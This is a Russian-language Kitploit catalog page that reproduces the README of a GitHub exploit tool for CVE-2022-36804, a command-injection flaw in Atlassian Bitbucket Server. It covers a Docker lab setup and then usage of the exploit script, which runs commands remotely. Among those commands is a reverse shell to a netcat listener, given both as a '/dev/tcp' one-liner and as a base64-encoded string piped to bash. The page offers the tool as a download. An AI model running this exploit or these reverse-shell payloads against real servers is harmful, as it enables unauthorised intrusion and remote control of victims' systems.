Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/imbas007/atlassian-bitbucket-cve-2022-36804
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеЛаборатории и Практика
GitHubimbas007/atlassian-bitbucket-cve-2022-36804

Atlassian-Bitbucket-CVE-2022-36804

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
3 лет назадЕщё не проверено

Atlassian-Bitbucket-Server-CVE-2022-36804

Критическая уязвимость внедрения команд была обнаружена в нескольких API-эндпоинтах Atlassian Bitbucket Server и Data Center. Эта уязвимость затрагивает все версии Bitbucket Server и Data Center, выпущенные до версий <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2> и <8.3.1>

Лаборатория для CVE-2022-36804

Сборка Docker

root@kitploit:~
docker build -t bitbucket .

Запуск Docker

root@kitploit:~
docker run -it bitbucket

Использование cve-2022-36804.py

Проверка удалённого выполнения кода (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Проверка RCE с пользовательской командой (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Проверка RCE с пользовательской командой, ключом проекта и именем репозитория

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Получение shell с помощью netcat

Замените 172.17.0.3 на ваш локальный IP-адрес

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"

Запустите прослушиватель netcat командой:

root@kitploit:~
nc -lvp 4444

Обратный shell онлайн: https://www.revshells.com

root@kitploit:~
Convert `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` to base64 in case of payload execution error. 

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"

root@kitploit:~
Рекомендуется установить уязвимую версию Bitbucket Server на машину с Windows/Linux для практики. Так будет проще получить обратный shell по сравнению с Docker-образами.

Дополнительную информацию можно найти [здесь](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)

# Ссылки
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804
Скачать инструмент